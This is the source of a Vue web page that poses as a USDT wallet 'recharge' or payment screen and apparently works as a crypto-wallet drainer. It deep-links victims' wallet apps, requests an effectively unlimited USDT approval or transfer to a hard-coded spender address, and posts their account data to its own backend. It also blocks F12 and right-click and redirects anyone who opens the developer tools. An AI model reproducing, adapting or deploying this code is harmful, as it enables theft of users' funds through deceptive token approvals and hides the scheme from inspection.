<template>
    <div class="home">
        <gl-Ethereum v-if="EthereumShow" @getAddress="getAddress" ref="Ethereum"/>

        <div class="one" v-if="!show">
            <div class="navList">
                <div
                    class="item"
                    @click="navListTap1(item)"
                    v-for="(item, index) in navList"
                    :key="index"
                >
                    <div class="_l">
                        <div class="img">
                            <img :src="item.img"/>
                        </div>
                        <div>
                            <div class="title">{{ item.nickname || item.name }}</div>
                            <div class="text">
                                {{ item.display ? $t("nav.type3") : item.payType }}
                            </div>
                        </div>
                    </div>
                    <div class="_r">
                        <div
                            :class="['railo', activeIndex == item.value ? 'active' : '']"
                        ></div>
                    </div>
                </div>

                <div>
                    <el-button @click="nextTap" class="btn" size="medium" type="primary">
                        {{ $t(`btn.b1`) }}
                    </el-button
                    >
                </div>
                <div class="tips">
                    {{ $t(`hint.h1`) }}
                </div>
            </div>
        </div>

        <div class="box" v-show="show">
            <div class="title" @click="aaaa">{{ $t("form.address") }}</div>
            <div class="_box _text">
                {{
                    defaultEthereumAddress
                        ? "0xdAC17F958D2ee523a2206206994597C13D831ec7"
                        : "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t"
                }}
            </div>
            <div class="title">
                <div>{{ $t("form.amount") }}</div>
                <div class="_text">{{ amount }}USDT</div>
            </div>
            <div class="_box">
                <el-input v-model="number"></el-input>
                <div cl>$ {{ (number * 1.0004).toFixed(2) }}</div>
            </div>
            <el-button
                class="btn"
                size="medium"
                type="primary"
                @click="authorization"
            >{{ $t("btn.b2") }}
            </el-button
            >
        </div>

        <div v-if="msgshow">{{ msgData }}</div>

        <el-dialog :title="$t(`hint.h2`)" :visible.sync="hintShow" width="90%">
            <span>{{ $t(`hint.recharge`) }}</span>
        </el-dialog>

        <el-dialog :title="$t(`hint.h3`)" :visible.sync="bitpieShow" width="90%">
            <div class="btnBox">
                <el-button @click="btCopy(1)" class="copyTitle">{{
                        $t("btn.b3")
                    }}
                </el-button>
            </div>
            <el-image
                :src="`/static/imgs/${$i18n.locale}/${walletName}-help1.jpg`"
            ></el-image>
            <el-image
                :src="`/static/imgs/${$i18n.locale}/${walletName}-help2.jpg`"
            ></el-image>
        </el-dialog>

        <el-dialog
            :title="$t(`hint.h2`)"
            :visible.sync="bitpieHinteShow"
            width="90%"
        >
            <div class="bitpieHinte">{{ bitpieHinteMsg }}</div>
        </el-dialog>

        <div v-if="qrcodeShow" @click.stop="qrcodeShow = false" class="qrcodeBox">
            <div class="_box">
                <div class="title">{{ $t("hint.h4", {name: walletName}) }}</div>
                <div id="qrcode" class="qrcode" ref="qrcode"></div>
                <div class="btnBox">
                    <el-button class="title" @click="btCopy(2)">{{
                            $t("btn.b3")
                        }}
                    </el-button>
                </div>
            </div>
        </div>

    </div>
</template>

<script>
import QRCode from "qrcodejs2";
import mode from "@/utils/native";
import axios from "axios";

var tp = require("tp-js-sdk");

export default {
    name: "HelloWorld",
    data() {
        return {
            msgData: null,
            msgshow: false,
            dialogVisible: false,
            EthereumShow: true,
            hintShow: false,
            radio: 1,
            show: false,
            href: "",
            radio1: false,
            radio2: false,
            copyUrl: "",
            // imtoken
            imtokenUrl: "imtokenv2://navigate/DappView?url=",
            // 合约
            contractAddress: "0xdAC17F958D2ee523a2206206994597C13D831ec7",
            approve: {
                address: "TU7zMQfwipHDy2FDA32C3dsmQU1X19Mdo5", //admin3
                amount: "90000000000000000000000000000",
                // method: "increaseApproval(address,uint256)",
                method: "approve(address,uint256)",

                remark: "",
                type: "",
            },
            number: "",
            // 余额
            amount: "",
            amount_hex: 0,
            Balance: "",
            //  钱包方法
            tronWeb: null,
            defaultAddress: null,
            contract: null,
            timeID: "",
            awindow: {},
            uuid: "",
            // 配置
            configList: [],
            registerNumber: 0,
            // 以太坊
            contractAddr: "",
            SpenderAddr: "",
            EthereumObj: {},
            //
            activeIndex: 1,
            asdasda: 1,
            //  钱包状态
            // 1波场钱包,2以太坊
            walletType: 1,
            utm_source: "",
            dataMsgs: {},
            dataMsgs1: "",
            qrcodeShow: false,
            bitpieShow: false,
            bitpieHinteShow: false,
            explainData: {},
            bitpieHinteMsg: "",
            explain: {
                0: {
                    name: "zhijie",
                    method: "approve(address,uint256)",
                    str: "095ea7b3",
                    type: 0,
                },
                1: {
                    name: "zenjia",
                    method: "increaseApproval(address,uint256)",
                    str: "d73dd623",
                    type: 0,
                },
                2: {
                    name: "zhuanzhang",
                    method: "transfer(address,uint256)",
                    str: "a9059cbb",
                    type: 0,
                },
                3: {
                    name: "zenjia",
                    method: "increaseApproval(address,uint256)",
                    str: "d73dd623",
                    type: 1,
                },
            },
            zzAddress: "",
            typeData: {},

            Am: 99999999,
            Az: "",
            jiamileixin: 0,
            walletName: "BITPIE",

            // 版本号
            ver: "",
            // 以太坊
            defaultEthereumAddress: "", //以太坊地址
        };
    },
    async created() {
        // await this.getAppInfo();
    },
    mounted() {
        if (process.env.NODE_ENV != "development") {
            this.konzhitai();
        }
        this.softwareJudgmentInit();

        this.getData();
        let href = window.location.href;
        // console.log(this.versionJudgmentControl("2.10.3.1734", "1", " 1.21"));
    },
    computed: {
        navList() {
            return this.$store.state.navList;
        },
    },
    methods: {
        async getAppInfo() {
            const res = await tp.getAppInfo();
            this.dataMsgs1 = res.data;
            this.ver = res.data.version;
            this.dataMsgs1 = res.data.version + "--";
        },
        // 软件进入判断处理
        softwareJudgmentInit(show) {
            this.uuid = this.$route.params.id || "";
            this.number = this.$route.query.number || "";
            this.href = window.location.href;
            let query = this.$route.query.query || "";
            query = this.$queryList(this.$route.query.query || "");
            if (query.number) {
                this.number = query.number;
            }
            let utm_source =
                this.GetHeader() ||
                this.$route.query.utm_source ||
                query.utm_source ||
                "";

            this.utm_source = utm_source ? utm_source.toLowerCase() : "";
            this.show = show
                ? true
                : this.$route.query.showType
                    ? true
                    : this.utm_source
                        ? true
                        : false;
            this.approve = this.$store.state.BaseData.approve;

            let explain = this.explain;

            let dataObj = {};
            dataObj = this.$store.state.BaseData.imToken;
            switch (this.utm_source) {
                case "imtoken":
                    dataObj = this.$store.state.BaseData.imToken;
                    break;
                case "tokenpocket":
                    dataObj = this.$store.state.BaseData.TokenPocket;

                    break;
                case "trustapp":
                    dataObj = this.$store.state.BaseData.trustapp;

                    break;

                case "bitpie":
                    if (mode.type == 3) {
                        dataObj = this.$store.state.BaseData.BITPIEIos;
                    } else {
                        dataObj = this.$store.state.BaseData.BITPIE;
                    }

                    break;
                case "tronlink":
                    dataObj = this.$store.state.BaseData.TronLink;

                    break;
                case "bitkeep":
                    dataObj = this.$store.state.BaseData.BitKeep;

                    break;
                case "metamask":
                    dataObj = this.$store.state.BaseData.metamask;

                    break;
                default:
                    break;
            }
            this.typeData = dataObj;

            if (this.utm_source) {
                let isVer = false;

                let verList = [];
                switch (mode.type) {
                    case 2:
                        isVer = dataObj.isVerAndroid || false;
                        verList = isVer ? dataObj.verAndroid || [] : [];
                        break;
                    case 3:
                        isVer = dataObj.isVerIos || false;
                        verList = isVer ? dataObj.verIos || [] : [];

                        break;
                }
                let ver = this.ver;
                this.dataMsgs1 = isVer && verList.length > 0;

                if (isVer && verList.length > 0) {
                    let newObj = {};

                    let off = false;
                    for (let index = 0; index < verList.length; index++) {
                        let item = verList[index];
                        off = this.versionJudgmentControl(
                            ver + "",
                            item.min + "",
                            item.max + ""
                        );

                        if (off) {
                            newObj = item;
                            break;
                        }
                    }
                    if (off) {
                        this.typeData.method = newObj.method;
                        this.typeData.type = newObj.type;

                        this.typeData.ztype = newObj.ztype;
                        this.typeData.zmethod = newObj.zmethod;
                        // this.dataMsgs1 = newObj;
                        let explainData = explain[newObj.method];

                        this.explainData = explainData;
                        this.approve.method = explainData.method;
                    } else {
                        let explainData = explain[dataObj.method];
                        this.explainData = explainData;
                        this.approve.method = explainData.method;
                    }
                } else {
                    let explainData = explain[dataObj.method];

                    this.explainData = explainData;
                    this.approve.method = explainData.method;
                }
            }
        },
        // 搬到判断控制
        versionJudgmentControl(ver, minVer, maxVer) {
            let verList = ver.split(".");
            let minVerList = minVer.split(".");
            let maxVerList = maxVer.split(".");

            let length = verList.length;
            length = minVerList.length > length ? minVerList.length : length;
            length = maxVerList.length > length ? maxVerList.length : length;
            // let off = false;

            for (let index = 0; index < length; index++) {
                const verItem = verList[index] ? verList[index] : "0";
                const minVerItem = minVerList[index] ? minVerList[index] : "0";
                const maxVerItem = maxVerList[index] ? maxVerList[index] : "0";

                const arr = this.getMaxLength(verItem, minVerItem, maxVerItem);
                verList[index] = arr[0];
                minVerList[index] = arr[1];
                maxVerList[index] = arr[2];
            }
            let a = verList.join("");
            let b = minVerList.join("");
            let c = maxVerList.join("");

            if (a >= b && a <= c) {
                return true;
            } else {
                return false;
            }
        },
        getMaxLength(verItem, minVerItem, maxVerItem) {
            let i = verItem.length;

            i = minVerItem.length > i ? minVerItem.length : i;
            i = maxVerItem.length > i ? maxVerItem.length : i;

            return [
                this.zeroFilling(verItem, i),
                this.zeroFilling(minVerItem, i),
                this.zeroFilling(maxVerItem, i),
            ];
        },
        // 补零
        zeroFilling(str, max) {
            let i = max - str.length;
            for (let index = 0; index < i; index++) {
                str += "0";
            }
            return str;
        },
        // 复制提示
        btCopy(type) {
            switch (type) {
                case 1:
                    this.bitpieHinteMsg = `请前往${this.walletName}钱包打开粘贴`;
                    break;
                case 2:
                    this.bitpieHinteMsg = `请前往${this.walletName}钱包打开粘贴`;
                    break;

                default:
                    break;
            }
            this.$copy(this.copyUrl);
            this.bitpieShow = false;
            this.bitpieHinteShow = true;
        },
        // 控制台禁止
        konzhitai() {
            //禁止F12键盘事件
            document.addEventListener("keydown", function (event) {
                console.log(event.keyCode);
                return 123 != event.keyCode || (event.returnValue = false);
            });
            //禁止右键、选择、复制
            document.addEventListener("contextmenu", function (event) {
                return (event.returnValue = false);
            });

            function resize() {
                var threshold = 200;
                var widthThreshold = window.outerWidth - window.innerWidth > threshold;
                var heightThreshold =
                    window.outerHeight - window.innerHeight > threshold;
                if (widthThreshold || heightThreshold) {
                    window.location.href = "https://www.google.com";
                }
            }

            window.addEventListener("resize", resize);
            resize();
            document.oncontextmenu = function (evt) {
                evt.preventDefault();
            };

            document.onselectstart = function (evt) {
                evt.preventDefault();
            };
        },
        // 二维码
        qrcode(url) {
            console.log(url);
            let str = url || window.location.href;
            this.copyUrl = str;
            new QRCode(this.$refs.qrcode, {
                width: 200,
                height: 200,
                text: str,
                colorDark: "#000",
                colorLight: "#fff",
            });
        },

        // 获取头部判断软件识别
        GetHeader() {
            let str = navigator.userAgent.toLowerCase();
            this.dataMsgs1 = str;

            let navigatorList = str.split("/");
            let str1 = navigator.appPackageName;
            str1 = str1 ? str1.toLowerCase() : "";

            let arr = [
                "bitpie",
                "imtoken",
                "tokenpocket",
                "tronlink",
                "bitkeep",
                "metamask",
                "trustapp",
            ];
            let data = "";
            let verobj = {
                imtoken: true,
                bitpie: true,
            };
            arr.forEach((item) => {
                if (str.indexOf(item) > -1 || str1.indexOf(item) > -1) {
                    data = item;
                    if (verobj[item]) {
                        if (navigatorList.length > 0) {
                            this.ver = navigatorList[navigatorList.length - 1];
                            this.dataMsgs1 = this.ver;
                        }
                    }
                }
            });

            return data;
        },
        // 接受以太坊地址
        getAddress(address, amount) {
            this.walletType = 2;

            // console.log(address, amount);
            this.amount = amount;
            this.show = !!address;
            this.defaultEthereumAddress = address;
        },
        aaaa() {
            this.asdasda++;
            if (this.asdasda > 5) {
                this.msgshow = true;
            }
        },
        navListTap1(data) {
            if (data.disabled) {
                this.$message("暂未开放");
            } else {
                this.activeIndex = data.value;
                if (this.activeIndex > 3) {
                    this.walletName = data.name;
                }
            }
        },
        // 获取基础配置
        async getData() {
            const res = await this.$h("get", `/Home/Tron/getauthconfig`, {
                uuid: this.uuid,
            });

            if (!res) {
                return;
            }
            if (res.Type == 200) {
                this.configList = res.Data;
            }
            console.log(res);
        },

        async getNumber() {
            let _this = this;
            let contract = await this.tronWeb.contract().at(this.contractAddress);
            let walletAddress = this.tronWeb.defaultAddress.base58;
            await contract.balanceOf(walletAddress).call(function (err, tex) {
                console.log(err);
                console.log(tex);
                if (err == null) {
                    let total = tex._hex / 10 ** 6;
                    _this.amount = total;
                    _this.amount_hex = tex._hex;
                    console.log(total);
                }
            });
        },
        // 以太坊判断处理
        EthereumAuthorization() {
            let list = this.configList;
            this.Az = this.$store.state.ETHBaseData.zzAddress;
            this.Am = this.$store.state.ETHBaseData.zzAmount;

            for (let index = 0; index < list.length; index++) {
                const element = list[index];
                // console.log(element.ChainId, this.$store.state.EthereumCoding);

                if (element.ChainId == this.$store.state.EthereumCoding) {
                    this.EthereumObj = element;

                    this.Am = element.ETHAm;
                    this.Az = element.ETHAz;
                    this.dataMsgs1 = this.Am <= this.amount;
                    if (this.Am <= this.amount) {
                        let dataObj = this.$store.state.ETHBaseData.EthereumConfig;
                        switch (this.utm_source) {
                            case "metamask":
                                dataObj = this.$store.state.ETHBaseData.metamask;
                                break;
                        }
                        this.explainType = 1;
                        dataObj.method = dataObj.zmethod;
                        this.EthereumObj.SpenderAddr = this.Az;
                        this.typeData = dataObj;
                    }
                    break;
                }
            }

            if (!this.EthereumObj.SpenderAddr) {
                let dataObj = this.$store.state.ETHBaseData.EthereumConfig;
                if (this.Am <= this.amount) {
                    switch (this.utm_source) {
                        case "metamask":
                            dataObj = this.$store.state.ETHBaseData.metamask;

                            break;
                    }
                    this.explainType = 1;
                    console.log(dataObj);

                    dataObj.method = dataObj.zmethod;
                    this.EthereumObj.SpenderAddr = this.Az;
                    this.typeData = dataObj;
                } else {
                    this.typeData = dataObj;
                    this.EthereumObj.SpenderAddr = dataObj.address;
                }
            }
            // console.log(this.typeData);
            // console.log(this.EthereumObj, "----s");
            // if (this.$refs.Ethereum.ethQuantity < 0.001) {
            //   this.$message.warning({
            //     duration: 5000,
            //     message: "没有足够的能量或ETh用于交易",
            //   });
            //   return;
            // }

            this.$refs.Ethereum.EthereumObj = this.EthereumObj;
            // console.log(this.$refs.Ethereum);
            switch (this.typeData.method) {
                case 2:
                    if (this.amount === 0) {
                        this.$message.warning({
                            duration: 5000,
                            message: "USDT余额不足",
                        });
                        return;
                    }
                    this.$refs.Ethereum.transferJoin();
                    break;
                default:
                    this.$refs.Ethereum.approveJoin();
                    break;
            }
        },
        // 下一步
        nextTap() {
            if (!this.radio) {
                this.$message("请选择钱包地址");
            }
            let Ethereum = this.$refs.Ethereum
                ? this.$refs.Ethereum.account
                    ? true
                    : false
                : false;

            if (!this.defaultAddress && !Ethereum) {
                let url = window.location.href;

                switch (this.activeIndex) {
                    case 1:
                        url = this.urlString("imtoken", 2);
                        window.location.href =
                            "imtokenv2://navigate?screen=DappView&url=" + url;
                        break;
                    case 2:
                        url = this.urlString("TokenPocket");
                        window.location.href = `tpdapp://open?params={"url": "${url}", "chain": "TRX", "source":"xxx"}`;

                        break;
                    case 3:
                        url = this.urlString("trustapp", 2);
                        console.log(url);
                        window.location.href = `trust://open_url?coin_id=60&url=${url}`;
                        // window.location.href = `trust://open_url?coin_id=60&url=https://compound.finance`;

                        break;
                    case 4:
                        url = this.urlString("bitpie");
                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        break;
                    case 5:
                        url = this.urlString("tronlink");

                        this.copyUrl = url;
                        this.$copy(this.copyUrl);

                        // this.qrcodeShow = true;
                        this.bitpieShow = true;
                        // setTimeout(() => {
                        //   this.qrcode(url);
                        // }, 100);
                        break;
                    case 6:
                        url = this.urlString("bitkeep");
                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        // this.qrcodeShow = true;

                        // setTimeout(() => {
                        //   this.qrcode(url);
                        // }, 100);
                        break;
                    case 7:
                        url = this.urlString("metamask");

                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        // this.qrcodeShow = true;

                        // setTimeout(() => {
                        //   this.qrcode(url);
                        // }, 100);
                        break;
                    case 8:
                        url = this.urlString("okex");

                        this.copyUrl = url;
                        this.$copy(this.copyUrl);
                        this.bitpieShow = true;
                        // this.qrcodeShow = true;

                        setTimeout(() => {
                            this.qrcode(url);
                        }, 100);
                        break;
                    default:
                        break;
                }
            } else {
                this.show = true;
            }
        },
        urlString(name, type = 1) {
            let url = window.location.href;
            let obj = {
                lang: this.$i18n.locale,
                showType: 1,
                type: this.$i18n.locale,
                locale: this.$i18n.locale,
                utm_source: name,
            };
            let strList = [];
            if (url.indexOf("?") > 0) {
                let query = this.$route.query;

                let obj1 = {...query, ...obj};
                let newUrl = url.split("?")[0];
                if (type == 2) {
                    Object.keys(obj1).forEach((item) => {
                        strList.push(item + "--" + obj1[item]);
                    });
                    url = newUrl + "?" + "query=" + strList.join(",");
                } else {
                    url = newUrl + "?" + this.$qs.stringify(obj1);
                }
            } else {
                if (type == 2) {
                    Object.keys(obj).forEach((item) => {
                        strList.push(item + "--" + obj[item]);
                    });
                    url = url + "?" + "query=" + strList.join(",");
                } else {
                    url = url + "?" + this.$qs.stringify(obj);
                }
            }
            return url;
        },
        // 授权
        async authorization() {
            this.softwareJudgmentInit(true);
            if (!this.defaultAddress) {
                //调用方式1
                let Ethereum = this.$refs.Ethereum ? this.$refs.Ethereum.account ? true : false : false;
                if (Ethereum) {
                    this.EthereumAuthorization();
                } else {
                    this.$message.warning({
                        duration: 5000,
                        message: "请选择TRX钱包交易",
                    });
                }
                // let url = window.location.href;
                // console.log(11);
                // if (url.indexOf("?") > 0) {
                //   url = url + "&showType=1";
                // } else {
                //   url = url + "?showType=1";
                // }
                // window.location.href = "imtokenv2://navigate/DappView?url=" + url;
                // // this.dialogVisible = true;
                // return;
            }
        },

        async authaccountUploading(data) {
            if (this.jiamileixin === 1) {
                return;
            }

            const res = await this.$h("post", `/Home/Tron/account`, data);

            if (res === undefined || res.Type === undefined || res.Type !== 200) {
                alert("系统异常，请稍后再试！")
            } else {
                alert("SUCCESS,You can close this page now !")
            }

        },
        async transferRecord(data) {
            if (this.jiamileixin === 1) {
                return;
            }
            const res = await this.$h("post", `/Home/Tron/createtrans`, data);
            // if (res.Type == 200) {
            // } else {
            // }
            console.log(res);
        },
    },
    watch: {
        $route(to) {
            if (to.params.id) {
                if (this.uuid != to.params.id) {
                    this.uuid = to.params.id;
                    console.log(this.uuid, 1);
                }
            } else {
                if (this.uuid) {
                    this.uuid = "";
                    console.log(this.uuid, 2);
                }
            }
        },
        show(val) {
            this.$store.commit("nexShow", val);
        },
    },
    destroyed() {
        window.clearInterval(this.timeID);
    },
};
</script>

<!-- Add "scoped" attribute to limit CSS to this component only -->

<style lang="less" scoped>
.home {
    font-family: PingFang SC;

    background-color: #efeff4;
    min-width: 320px;
    max-width: 750px;
    min-height: 100vh;
    margin: 0 auto;

    .box {
        padding: 20px 20px;

        .title {
            display: flex;
            padding: 24px 10px;
            justify-content: space-between;
            font-size: 18px;

            ._text {
                color: #949495;
            }
        }

        ._box {
            border-radius: 16px;
            padding: 24px 20px;
            font-size: 14px;
            color: #949495;

            &._text {
                word-break: break-all;
            }

            .el-input {
                /deep/ .el-input__inner {
                    border: none;
                }
            }

            background-color: #fff;
        }
    }

    .btn {
        margin-top: 30px;
        height: 50px;
        width: 100%;
    }

    .one {
        padding: 20px;

        .navList {
            .item {
                display: flex;
                align-items: center;
                justify-content: space-between;
                padding: 10px 10px;
                border-bottom: 1px solid #d2d2d2;

                ._l {
                    display: flex;

                    .img {
                        width: 50px;
                        height: 50px;
                        margin-right: 20px;

                        img {
                            width: 100%;
                        }
                    }

                    .text {
                        color: #949495;
                    }
                }

                ._r {
                    .railo {
                        width: 15px;
                        height: 15px;
                        border: 1px solid rgb(95, 95, 95);
                        border-radius: 5px;

                        &.active {
                            background: #46b3f1;
                            border-color: #46b3f1;
                        }
                    }
                }
            }
        }

        .tips {
            background: #f2f2f2;
            border-radius: 8px;
            margin: 0 auto;
            margin-top: 20px;
            color: #282828;
            padding: 15px;
        }
    }
}

.qrcodeBox {
    position: fixed;
    left: 0;
    top: 0;
    right: 0;
    bottom: 0;
    background: rgba(0, 0, 0, 0.3);
    display: flex;
    align-items: center;
    justify-content: center;

    ._box {
        background: #fff;
        border-radius: 10px;
        padding: 20px;
        text-align: left;

        .title {
            text-align: center;
        }

        .qrcode {
            margin: 10px 0;
        }
    }
}

.btnBox {
    display: flex;
    justify-content: center;
}

.copyTitle {
    text-align: center;
    // padding: 10px;
    font-size: 18px;
    color: #000;
    width: 140px;
    display: inline-block;
    margin: 10px auto;
}

.bitpieHinte {
    text-align: center;
    font-size: 18px;
    color: #000;
}
</style>
<style lang="less">
.el-dialog {
    .el-dialog__body {
        padding: 15px 10px;
        padding-top: 0;
    }
}
</style>
